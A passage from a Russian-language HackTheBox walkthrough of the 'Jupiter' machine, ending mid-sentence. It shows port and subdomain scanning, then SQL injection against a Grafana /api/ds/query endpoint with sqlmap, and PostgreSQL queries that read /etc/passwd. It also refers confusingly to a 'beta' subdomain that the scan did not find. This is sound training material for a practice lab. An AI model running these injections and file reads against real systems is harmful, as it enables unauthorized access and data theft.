{"id":810,"date":"2023-10-21T18:00:00","date_gmt":"2023-10-21T15:00:00","guid":{"rendered":"https:\/\/seq.team\/?p=810"},"modified":"2025-12-02T15:15:49","modified_gmt":"2025-12-02T12:15:49","slug":"razbor-hackthebox-jupiter-medium","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/razbor-hackthebox-jupiter-medium\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox &#8211; Jupiter (Medium)"},"content":{"rendered":"\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:66.66%\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td><td>Medium<\/td><\/tr><tr><td>\u041e\u0421:<\/td><td>Linux<\/td><\/tr><tr><td>\u0411\u0430\u043b\u043b\u044b:<\/td><td>30<\/td><\/tr><tr><td>IP:<\/td><td>10.10.11.216<\/td><\/tr><tr><td>\u0422\u0435\u0433\u0438:<\/td><td>SQLi, PostrgeSQL, LPE, Jupyter RCE, Linux Privileges<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:33.33%\"><\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n<p>\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f <code>SQLi<\/code>. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441\u0430 <code>PostgreSQL<\/code> \u0438 \u0432\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0435 \u043f\u0440\u0430\u0432 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u0440\u0438 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0438 \u0441 \u0421\u0423\u0411\u0414 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043e\u0442 \u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <strong>postrges<\/strong>. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u044b <code>\/home\/juno\/.local\/bin\/shadow<\/code> \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e <strong>juno<\/strong> \u0438 \u0434\u043e\u0431\u0443\u0434\u0435\u043c \u0435\u0433\u043e \u0444\u043b\u0430\u0433. \u0414\u0430\u043b\u0435\u0435, \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 <code>Jupyter Notebook<\/code> \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u043a\u043e\u0434 \u043d\u0430 Python, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u043d\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <strong>jovian<\/strong>. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 <code>\/usr\/local\/bin\/sattrack<\/code>, \u0441\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c <code>\/bin\/bash<\/code> \u0432 \u043d\u0435\u0433\u043e, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0438 \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0441\u0447\u0451\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <strong>root<\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n<p>\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>nmap -sS -p- 10.10.11.216<\/p>\n<\/blockquote>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\n<\/pre><\/div>\n\n\n<p>\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: <code>nmap -sVC -O -p22,80 10.10.11.216<\/code><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nPORT     STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 ac:5b:be:79:2d:c9:7a:00:ed:9a:e6:2b:2d:0e:9b:32 (ECDSA)\n|_  256 60:01:d7:db:92:7b:13:f0:ba:20:c6:c9:00:a7:1b:41 (ED25519)\n80\/tcp open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/jupiter.htb\/\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n<\/pre><\/div>\n\n\n<p>\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0434\u043e\u043c\u0435\u043d \u0432 <code>\/etc\/hosts<\/code>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n# HTB\n10.10.11.216    jupiter.htb\n<\/pre><\/div>\n\n\n<p>\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043d\u0430 jupiter.htb:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ngobuster dir -u http:\/\/jupiter.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n\/img                  (Status: 301) &#x5B;Size: 178] &#x5B;--&amp;gt; http:\/\/jupiter.htb\/img\/]\n\/css                  (Status: 301) &#x5B;Size: 178] &#x5B;--&amp;gt; http:\/\/jupiter.htb\/css\/]\n\/js                   (Status: 301) &#x5B;Size: 178] &#x5B;--&amp;gt; http:\/\/jupiter.htb\/js\/]\n\/fonts                (Status: 301) &#x5B;Size: 178] &#x5B;--&amp;gt; http:\/\/jupiter.htb\/fonts\/]\n\/Source               (Status: 301) &#x5B;Size: 178] &#x5B;--&amp;gt; http:\/\/jupiter.htb\/Source\/]\n\/sass                 (Status: 301) &#x5B;Size: 178] &#x5B;--&amp;gt; http:\/\/jupiter.htb\/sass\/]\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-19.png\" alt=\"\" class=\"wp-image-814\" width=\"700\" \/><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-18.png\" alt=\"\" class=\"wp-image-813\" width=\"700\" height=\"104\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043f\u0440\u0438\u0434\u0451\u043c \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435\u043a\u0438\u0439 \u0441\u0430\u0439\u0442 \u043e\u0431\u0441\u0435\u0440\u0432\u0430\u0442\u043e\u0440\u0438\u0438.<\/p>\n\n\n\n<p>\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u043e\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0433\u043e \u043b\u0443\u0442\u0430, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u0434\u0440\u0443\u0433\u043e\u0439 \u0441\u043a\u0430\u043d\u0435\u0440 \u043d\u0430 \u0432\u0430\u0448\u0435 \u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u0435:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\nffuf -u http:\/\/jupiter.htb\/ -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -H &quot;HOST:FUZZ.jupiter.htb&quot;  -mc all -fw 6\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n&#x5B;Status: 200, Size: 2191, Words: 370, Lines: 52, Duration: 106ms]\n    * FUZZ: kiosk\n<\/pre><\/div>\n\n\n<p>\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d beta \u0432 \u0444\u0430\u0439\u043b hosts \u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0435\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n# HTB\n10.10.11.216    jupiter.htb    kiosk.jupiter.htb\n<\/pre><\/div>\n\n\n<p>\u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043a \u0441\u0435\u0440\u0432\u0438\u0441\u0443 beta.only4you.htb:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-20.png\" alt=\"\" class=\"wp-image-815\" width=\"800\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u0418\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0439 \u043a\u0438\u043e\u0441\u043a \u0434\u043b\u044f \u043e\u0447\u043d\u044b\u0445 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u043b\u0435\u0439 \u043e\u0431\u0441\u0435\u0440\u0432\u0430\u0442\u043e\u0440\u0438\u0438. \u0422\u0430\u043a\u0436\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0432 \u044d\u0442\u043e\u043c \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u0435 \u043a\u0438\u043e\u0441\u043a\u0430:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ngobuster dir -u http:\/\/kiosk.jupiter.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n\/login                (Status: 200) &#x5B;Size: 34390]\n\/profile              (Status: 302) &#x5B;Size: 29] &#x5B;--&amp;gt; \/login]\n\/signup               (Status: 200) &#x5B;Size: 34390]\n\/public               (Status: 302) &#x5B;Size: 31] &#x5B;--&amp;gt; \/public\/]\n\/admin                (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/plugins              (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/live                 (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/org                  (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/logout               (Status: 302) &#x5B;Size: 29] &#x5B;--&amp;gt; \/login]\n\/explore              (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/monitoring           (Status: 200) &#x5B;Size: 34390]\n\/verify               (Status: 200) &#x5B;Size: 34390]\n\/metrics              (Status: 200) &#x5B;Size: 111261]\n\/configuration        (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/connections          (Status: 302) &#x5B;Size: 24] &#x5B;--&amp;gt; \/]\n\/styleguide           (Status: 200) &#x5B;Size: 34390]\n\/playlists            (Status: 200) &#x5B;Size: 34390]\n\/alerting             (Status: 200) &#x5B;Size: 34390]\n<\/pre><\/div>\n\n\n<p>\u041e\u0431\u0440\u0430\u0442\u0438\u043c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0430 <code>kiosk.jupiter.htb<\/code>:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-21.png\" alt=\"\" class=\"wp-image-816\" height=\"500\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u0412\u043d\u0438\u0437\u0443 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e Grafana <code>v9.5.2 (cfcea75916)<\/code> &#8211; \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">RCE \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SQLi \u0432 PostgreSQL<\/h3>\n\n\n\n<p>\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 POST \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u043d\u0430 kiosk.jupiter.htb\/api\/ds\/query \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e, \u0447\u0442\u043e \u0432 \u0442\u0435\u043b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044f \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 SQL:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-22.png\" alt=\"\" class=\"wp-image-817\" width=\"800\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432 \u0442\u0430\u043a\u043e\u043c \u0432\u0438\u0434\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0434\u043b\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043f\u043e\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 Grafana, \u043d\u043e, \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0442\u0435\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445, \u043a\u043e\u0433\u0434\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d. \u041c\u044b \u0436\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 \u0421\u0423\u0411\u0414 Postgres \u043d\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c. \u0421\u043e\u0445\u0440\u0430\u043d\u0438\u043c \u044d\u0442\u043e\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u0430\u0442\u0430\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SQLMap:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code>sqlmap -r req.txt --dbs<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n&#x5B;12:15:07] &#x5B;INFO] the back-end DBMS is PostgreSQL\nweb server operating system: Linux Ubuntu\nweb application technology: Nginx 1.18.0\nback-end DBMS: PostgreSQL\n\n&#x5B;12:15:07] &#x5B;INFO] fetching database (schema) names\navailable databases &#x5B;3]:\n&#x5B;*] information_schema\n&#x5B;*] pg_catalog\n&#x5B;*] public\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043c\u044b \u0437\u043d\u0430\u0435\u043c, \u0447\u0442\u043e \u0421\u0423\u0411\u0414 &#8211; PosrtgreSQL \u043c\u043e\u0436\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0440\u044f\u0434 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0438 \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0431\u043e\u043b\u044c\u0448\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nselect version()\n-&amp;gt;PostgreSQL 14.8 (Ubuntu 14.8-0ubuntu0.22.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, 64-bit\nselect current_user\n-&amp;gt;grafana_viewer\nselect datname FROM pg_database\n-&amp;gt;postgres, moon_namesdb, template1, template0\nSELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;\n-&amp;gt;true\nCREATE TABLE test123(t TEXT); COPY test123 FROM &#039;\/etc\/passwd&#039;; SELECT * FROM test123;\n-&amp;gt;\n&quot;root:x:0:0:root:\/root:\/bin\/bash&quot;,\n&quot;daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin&quot;,\n&quot;bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin&quot;,\n&quot;sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin&quot;,\n&quot;sync:x:4:65534:sync:\/bin:\/bin\/sync&quot;,\n&quot;games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin&quot;,\n&quot;man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin&quot;,\n&quot;lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin&quot;,\n&quot;mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin&quot;,\n&quot;news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin&quot;,\n&quot;uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin&quot;,\n&quot;proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin&quot;,\n&quot;www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin&quot;,\n&quot;backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin&quot;,\n&quot;list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin&quot;,\n&quot;irc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin&quot;,\n&quot;gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin&quot;,\n&quot;nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin&quot;,\n&quot;_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin&quot;,\n&quot;systemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin&quot;,\n&quot;systemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin&quot;,\n&quot;messagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin&quot;,&quot;systemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin&quot;,\n&quot;pollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false&quot;,\n&quot;sshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin&quot;,\n&quot;syslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin&quot;,\n&quot;uuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin&quot;,\n&quot;tcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin&quot;,\n&quot;tss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false&quot;,\n&quot;landscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin&quot;,\n&quot;usbmux:x:112:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin&quot;,\n&quot;juno:x:1000:1000:juno:\/home\/juno:\/bin\/bash&quot;,\n&quot;lxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false&quot;,\n&quot;fwupd-refresh:x:113:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin&quot;,\n&quot;postgres:x:114:120:PostgreSQL administrator,,,:\/var\/lib\/postgresql:\/bin\/bash&quot;,\n&quot;grafana:x:115:121::\/usr\/share\/grafana:\/bin\/false&quot;,\n&quot;jovian:x:1001:1002:,,,:\/home\/jovian:\/bin\/bash&quot;,\n&quot;_laurel:x:998:998::\/var\/log\/laurel:\/bin\/false&quot;\n<\/pre><\/div>\n\n\n<p>\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435: \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f PostgreSQL, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0442\u0430\u0431\u043b\u0438\u0446\u044b \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445, \u0432\u044b\u044f\u0441\u043d\u0435\u043d\u043e \u0438\u043c\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e 